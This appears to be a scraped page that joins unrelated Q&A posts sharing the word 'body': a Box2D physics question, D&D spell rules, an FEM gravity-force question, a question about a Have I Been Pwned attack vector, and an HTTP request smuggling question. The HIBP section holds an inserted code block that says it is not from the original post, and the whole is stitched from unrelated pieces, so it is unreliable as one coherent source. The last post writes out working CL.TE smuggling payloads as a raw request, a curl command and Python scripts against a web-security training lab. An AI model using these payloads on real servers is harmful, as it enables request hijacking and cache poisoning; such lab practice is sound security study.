Unable to rotate box2d body with torque if revolute joint introduced

I created a simple body (PLAYER) where, as speed increases, the angle of the body increases slightly. I set the torque property based on velocity, to change the body’s angle, and it looks like the player is leaning forward as he runs. Great.

I wanted to prevent my PLAYER from flipping over (when hitting other bodies), so I created a second body and placed a revolute joint between them. The second body has rotation disabled, and is dynamic. I discovered that I did not need to apply any angle limits to prevent flipping, since the joint seemed to resist rotation. The player actually rights himself if flipped on his side. (The joint seems to want to return to 0 angle). The motor is disabled, no motor speed, no motor torque. Still, the joint returns to 0′.

The PLAYER still rotates a bit when hitting other bodies, but I can no longer rotate the body with any torque value (to make him lean forward). Why? I need to restore the leaning effect.

I don’t understand why the second body + revolute joint prevent rotation due to any torque applied. Can someone explain, and offer a solution?

Magic for a cleric to hide a living body

I’m looking for a way that a cleric in 5E D&D can hide a living body, i.e., with a magic spell. Considering up to 5th-level spells, PHB rules only.

The use-case could be, for example: When an ally is fallen and we’d like to make sure that monsters don’t hit-to-kill the fallen party member, or drag them off mid-combat to hold as captives or finish them off.

I’ve scoured the cleric PHB listings and basically come up empty. What can we do in this case to render a living body unseen?

Stone Shape, body surface area, and imprisonment [closed]

While examining various uses for stone shape and trying to double check the math on them all (such as cages, jamming doors, making poles, etc) it occurred to me that a use potentially far better than ‘encasing them in a box of rock’ would be instead to do a skin tight encasing of the individual (making it, practically speaking, impossible to move). Granted, for high (18-20) strength characters and creatures I suspect it’d be a full round action to simply break out of it, but I’m curious how the math exactly checks out, and what the exact numbers are. Surface area of a person (or a ‘medium’ creature) would need to be determined, and for small or large creatures there’d be other determinations one would have to make.

Still, it seems to me that it would be using significantly less stone than encasing someone in a box or cage.

It wouldn’t be my go to use, but I can imagine that against say some sort of goblin spell caster, or an evil elf wizard it could have some practical use.

Does contingency work if you are polymorphed and so the statuette merged with your body?

The spell Contingency has a material component of:

a statuette of yourself carved from ivory and decorated with gems worth at least 1,500 gp

The spell also ends if this statue isn’t on your person.

Also, contingency ends on you if its material component is ever not on your person.

If you are polymorphed into another form, the spell Polymorph states:

The target’s gear melds into the new form. The creature can’t activate, use, wield, or otherwise benefit from any of its equipment.

Is having the contingency spell not end a "benefit" of your equipment? Or, since it’s melded into your form, is it still on your person? Would the contingency still trigger after reverting to your humanoid form?

Specify a force on the entire body (e.g. gravity)

In the thread Stress calculations using finite elements User21 showed an example how to define a force over the entire body during FEM calculation as boundary condition. See the screenshot below from the corresponding position in this thread.

In the description of the definition of the boundary condition – force on the entire body – User21 has defined the differential equation system as follows.

$ps == \{0, -9.8\}$

Which unit has this power? Is the unit $N/m^2$?

If $N/m^2$ is the correct unit, then I can understand how to calculate the normalized body force from the density and volume of the body and insert it into the right side of the differential equation.

If $N/m^2$ is not the right unit, then I have the following questions for you:

How is the density of the material or the mass considered here? Could you please show how to use this correctly in the equation?

In my case I have a centripetal acceleration due to rotation and the equation would look like this:

$ps == \{\omega^2 * x, \omega^2 * y\}$

Omega is the angular velocity of the body for which the deformations are to be calculated with FEM. And the expression

$\omega^2 * r$

is the centripetal acceleration, where $r$ is the distance from the center of rotation.

However also here I have the problem, density resp. masses are not considered.

Does anybody have an answer to the question how to use the density and the mass correctly in the equation?

Many thanks in advance!

Is this (explained in body) a possible attack vector when using haveibeenpwned API?

I’m currently working on understanding, and contemplating implementing, password strength validation for sign-ups in my app, including checking haveibeenpwned to see if the entered password is compromised elsewhere.

I understand the process involves the site sending a partial hash of the password to HIBP and HIBP will respond whether it’s pwned.

I am also assuming that it is possible that HIBP stores logs of my API request and that it may contain information leading back to my app.

If HIBP gets hacked, and an attacker gains access to the above hypothetical logs, assuming that they contain all the information in the original request – the partial hash and where it came from (my site) – can the attacker construct an attack on my site in this way?

  1. Hash the passwords in the list of pwned password and get a list of hashes
  2. Match the partial hash he has with those in the above list and derive a refined dictionary of N number of possible passwords with same partial hash
  3. Try the passwords on my site

I am aware at every point in the above, measures can be put in place to mitigate each, e.g. 2FA. But it is not my objective to ask for how to secure my sign up, but to validate my concerns with using HIBP and whether there’s an attack vector to be considered.

PS: I’m not a security expert but I do know how passwords and hashes work. As HIBP is new to me, I don’t fully know how it works and all the features of its API. Pardon me if I made wrong assumptions.
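The range-query flow the question describes, as an added example that is not part of the original post. It assumes the Pwned Passwords k-anonymity scheme (the first 5 hex characters of the SHA-1 hash are sent, the remaining 35 are compared locally) and uses a constructed offline stand-in (`FakeRangeService`, `SAMPLE_CORPUS`, both hypothetical names) in place of the real service, so the recorded `request_log` shows exactly what a service-side log could contain.

```python
import hashlib

# Constructed sample corpus standing in for the breached-password data set;
# the counts are made up for this example.
SAMPLE_CORPUS = {"password": 1000, "hunter2": 50, "letmein": 20}

def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()

def split_hash(password, prefix_len=5):
    """Return (prefix sent to the service, suffix that stays on the client)."""
    digest = sha1_hex(password)
    return digest[:prefix_len], digest[prefix_len:]

class FakeRangeService:
    """Offline stand-in for the range endpoint; records what it was sent."""
    def __init__(self, corpus):
        self.corpus = corpus
        self.request_log = []

    def fetch_range(self, prefix):
        self.request_log.append(prefix)  # the only value the service ever sees
        lines = []
        for pw, count in self.corpus.items():
            digest = sha1_hex(pw)
            if digest.startswith(prefix):
                lines.append(f"{digest[len(prefix):]}:{count}")
        return "\r\n".join(lines)  # SUFFIX:COUNT lines, one per known hash

def pwned_count(password, fetch_range):
    """How often the password appears in the corpus; 0 if it is not listed."""
    prefix, suffix = split_hash(password)
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip().upper() == suffix:  # comparison happens locally
            return int(count)
    return 0

def demo():
    service = FakeRangeService(SAMPLE_CORPUS)
    results = {pw: pwned_count(pw, service.fetch_range)
               for pw in ("password", "correct horse battery staple 42")}
    return results, service.request_log

if __name__ == "__main__":
    results, log = demo()
    print(results)
    print("service saw only:", log)
```

The service receives a prefix for every checked password, listed or not, so a logged prefix by itself does not record whether the password was found or whether the sign-up went ahead with it.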

Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting PortSwigger’s WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a Python script to complete the challenge for me.

Intended solution from Burp Repeater:

    POST / HTTP/1.1
    Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Length: 10
    Transfer-Encoding: chunked

    0

    G

If you right click and select ‘Copy as curl command’:

    curl -i -s -k -X $'POST' \
        -H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' \
        --data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \
        $'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

    import requests

    def POST_CLTE():
        url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
        headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',
        'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}

        data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'

        # Prepare the request explicitly so the headers above are sent as given
        s = requests.Session()
        r = requests.Request('POST', url, headers=headers, data=data)
        prepared = r.prepare()
        response = s.send(prepared)

        print(response.request.headers)
        print(response.status_code)
        print(response.text)

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X[\n]Transfer-Encoding: chunked 

I’ve attempted to reproduce the request using PyCurl:

    #!/usr/bin/python

    import pycurl
    from StringIO import StringIO

    buffer = StringIO()
    c = pycurl.Curl()
    c.setopt(c.POST, 1)
    c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
    c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a')
    #c.setopt(pycurl.POSTFIELDSIZE, 8)
    c.setopt(c.HTTPHEADER, [
        'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
        'Content-Length: 8',
        'Transfer-Encoding: chunked',
        'Content-Type: application/x-www-form-urlencoded'
        ])
    #c.setopt(c.CRLF, 1)
    c.setopt(c.VERBOSE, 1)
    c.setopt(c.HEADER, 1)
    c.setopt(c.WRITEDATA, buffer)
    c.perform()
    c.close()

    body = buffer.getvalue()

    print(body)

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

    *   Trying 18.200.141.238:443...
    * TCP_NODELAY set
    * Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)
    * found 387 certificates in /etc/ssl/certs
    * ALPN, offering h2
    * ALPN, offering http/1.1
    * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
    *        server certificate verification OK
    *        server certificate status verification SKIPPED
    *        common name: web-security-academy.net (matched)
    *        server certificate expiration date OK
    *        server certificate activation date OK
    *        certificate public key: RSA
    *        certificate version: #3
    *        subject: CN=web-security-academy.net
    *        start date: Fri, 05 Jul 2019 00:00:00 GMT
    *        expire date: Wed, 05 Aug 2020 12:00:00 GMT
    *        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
    * ALPN, server did not agree to a protocol
    > POST / HTTP/1.1
    Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
    Accept: */*
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
    Content-Length: 8
    Transfer-Encoding: chunked
    Content-Type: application/x-www-form-urlencoded

    8
    * upload completely sent off: 15 out of 8 bytes
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 500 Internal Server Error
    < Content-Type: application/json; charset=utf-8
    < Connection: close
    < Content-Length: 23
    <
    * Closing connection 0
    HTTP/1.1 500 Internal Server Error
    Content-Type: application/json; charset=utf-8
    Connection: close
    Content-Length: 23

    "Internal Server Error"

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.